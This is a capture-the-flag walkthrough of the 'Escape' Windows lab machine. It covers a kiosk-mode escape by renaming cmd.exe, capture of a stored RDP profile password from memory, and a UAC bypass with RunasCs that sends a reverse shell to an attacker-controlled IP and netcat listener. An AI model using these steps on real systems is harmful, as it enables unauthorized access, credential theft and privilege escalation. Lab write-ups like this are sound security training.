Escape is an easy Windows machine created by xct and kozie. It involves Kiosk escape, capturing a password from an encrypted RDP profile, and bypassing UAC.

NMAP

1
2
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

From the NMAP scan, we see just one port open, which is RDP.

RDP

We don’t have any credentials, but we can try to RDP without providing anything and by disabling nla protocol security:

1
➜  xfreerdp /v:10.10.103.87 /size:1280x720 /tls-seclevel:0 -sec-nla

We are presented with a conference display screen and a message saying we can login as KioskUser0 without a password:
Pasted image 20240528184035.png
Indeed, we got in and find ourselves inside a kiosk mode, a feature used to limit what a user can do on a machine.
Untitled

Kiosk Escape

So our goal is to escape this mode and get full access to the machine. If we search for kiosk mode escape, we can find this article that talks about it.
An easy way to escape is to press the Windows key, search for msedge and start it, then from the search bar we can type file:///C:/ and go into the C drive
Pasted image 20240528190215.png
Now, we can navigate to C:/Windows/System32/, click on cmd.exe, and it will download.
Pasted image 20240528190408.png
After that, we can open the Downloads folder and find it there. However, if we try to open it, the following message appears: This operation has been canceled due to system limitations. Contact your system administrator.
Pasted image 20240528190922.png
This restriction is due to Kiosk mode, which only allows Microsoft edge. So, what if we rename cmd.exe to msedge
Untitled
You guessed it right! it will launch cmd.exe. That’s because AppLocker is only checking the file name instead of the path.

User

Now that we’ve escaped the Kiosk mode and have command prompt running, we can grab our user flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
C:\Users\kioskUser0\Desktop>dir
The system cannot find message text for message number 0x235e in the message file for Application.
The system cannot find message text for message number 0x235b in the message file for Application.

DNS bad key.
02/04/2024  02:15 AM    The system cannot find message text for message number 0x2373 in the message file for Application.
                                       .
02/04/2024  02:15 AM    The system cannot find message text for message number 0x2373 in the message file for Application.
                                       ..
02/03/2024  04:47 AM             2,352 Microsoft Edge.lnk
02/03/2024  04:48 AM                36 user_07eb46.txt
      The system cannot find message text for message number 0x2378 in the message file for Application.
      The system cannot find message text for message number 0x2379 in the message file for Application.

C:\Users\kioskUser0\Desktop>type user_07eb46.txt
VL{REDCATED}

As you can see, the command prompt is throwing errors. To get rid of that, we can spawn PowerShell, and all those errors would disappear.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
C:\Users\kioskUser0\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell <https://aka.ms/pscore6>

PS C:\Users\kioskUser0\Desktop> ls

    Directory: C:\Users\kioskUser0\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          2/3/2024   3:47 AM           2352 Microsoft Edge.lnk
-a----          2/3/2024   3:48 AM             36 user_07eb46.txt

PrivEsc

In C:\, we can see a folder called _admin :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
PS C:\> cmd /c dir /A
 Volume in drive C has no label.
 Volume Serial Number is 4A4B-52B4

 Directory of C:\

02/04/2024  01:52 AM    <DIR>          $Recycle.Bin
02/03/2024  10:36 AM    <DIR>          $WinREAgent
02/03/2024  12:32 PM    <JUNCTION>     Documents and Settings [C:\Users]
02/04/2024  02:35 AM             8,192 DumpStack.log
05/28/2024  10:32 AM             8,192 DumpStack.log.tmp
05/28/2024  10:32 AM       418,598,912 hiberfil.sys
02/03/2024  04:11 AM    <DIR>          inetpub
05/28/2024  10:32 AM     1,207,959,552 pagefile.sys
12/07/2019  02:14 AM    <DIR>          PerfLogs
02/03/2024  07:03 AM    <DIR>          Program Files
02/03/2024  04:03 AM    <DIR>          Program Files (x86)
02/04/2024  02:02 AM    <DIR>          ProgramData
05/28/2024  10:33 AM    <DIR>          Recovery
05/28/2024  10:32 AM        16,777,216 swapfile.sys
02/03/2024  03:32 AM    <DIR>          System Volume Information
02/03/2024  04:43 AM    <DIR>          Users
05/28/2024  10:35 AM    <DIR>          Windows
02/03/2024  04:05 AM    <DIR>          _admin
               5 File(s)  1,643,352,064 bytes
              13 Dir(s)   6,637,834,240 bytes free

Inside it, we find a file called profile.xml related to Remote Desktop Plus.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
PS C:\> cd .\_admin\
PS C:\_admin> ls

    Directory: C:\_admin

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          2/3/2024   3:04 AM                installers
d-----          2/3/2024   3:05 AM                passwords
d-----          2/3/2024   3:05 AM                temp
-a----          2/3/2024   3:03 AM              0 Default.rdp
-a----          2/3/2024   3:04 AM            574 profiles.xml

PS C:\_admin> cat .\profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
    <Secure>False</Secure>
  </Profile>
</Data>

We can find the actual Remote Desktop Plus program inside C:\Program Files (x86)\Remote Desktop Plus.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
PS C:\> cd '.\Program Files (x86)\'
PS C:\Program Files (x86)> ls

    Directory: C:\Program Files (x86)

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         12/7/2019   1:31 AM                Common Files
d-----          2/3/2024   3:07 AM                Internet Explorer
d-----          2/3/2024   3:14 AM                Microsoft
d-----         12/7/2019   1:31 AM                Microsoft.NET
d-----          2/3/2024   3:03 AM                Remote Desktop Plus
d-----          2/3/2024   3:07 AM                Windows Defender
d-----          2/3/2024   3:07 AM                Windows Mail
d-----          2/3/2024   3:07 AM                Windows Media Player
d-----         12/7/2019   1:54 AM                Windows Multimedia Platform
d-----         12/7/2019   1:50 AM                Windows NT
d-----          2/3/2024   3:07 AM                Windows Photo Viewer
d-----         12/7/2019   1:54 AM                Windows Portable Devices
d-----         12/7/2019   1:31 AM                WindowsPowerShell

PS C:\Program Files (x86)> cd '.\Remote Desktop Plus\'
PS C:\Program Files (x86)\Remote Desktop Plus> ls

    Directory: C:\Program Files (x86)\Remote Desktop Plus

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/13/2018  10:47 PM         267264 rdp.exe

Let’s start Remote Desktop Plus and load the profile.xml file inside it by going to Manage profiles -> Import and export -> Import profiles. You’ll need to place the profile.xml file in the Downloads folder since that’s the only location from which we can load files. Now, we can capture the password from memory using a tool called BulletsPassView. We just need to start the tool when the profile gets loaded into the RDP program, and it will immediately find the password, as shown here:
Untitled
This is the password of the admin user, who is in the Administrators group.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
PS C:\Users\kioskUser0\Downloads> net user admin
User name                    admin
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/3/2024 3:45:01 AM
Password expires             Never
Password changeable          2/3/2024 3:45:01 AM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/3/2024 5:30:47 AM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

Now that we have the password, we can use runas to spawn a command prompt as the admin user:

1
2
3
PS C:\Users\kioskUser0\Downloads> runas /user:admin cmd
Enter the password for admin:
Attempting to start cmd as user "ESCAPE\admin" ...

UAC Bypass

Although the use is in the Administrators group, he doesn’t have any privileges and that’s because of UAC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
C:\Windows\system32>whoami
escape\admin

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

To bypass UAC, we can use RunasCs.exe with the --bypass-uac flag:

1
2
3
4
5
PS C:\Users\kioskUser0\Downloads> .\r.exe admin <REDACTED> -r 10.8.0.210:1337 cmd --bypass-uac

[+] Running in session 2 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: WinSta0\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 1376 created in background.

As you can see, we got a shell as the admin user with all privileges:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
➜  nc -nlvp 1337
Listening on 0.0.0.0 1337
Connection received on 10.10.103.87 51648
Microsoft Windows [Version 10.0.19045.3996]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Disabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Disabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

Now we can grab the root flag:

1
2
3
4
C:\Windows\system32>cd C:\users\administrator\desktop

C:\Users\Administrator\Desktop>type root.txt
VL{REDACTED}

That concludes this box. I hope you learned something new! 🐱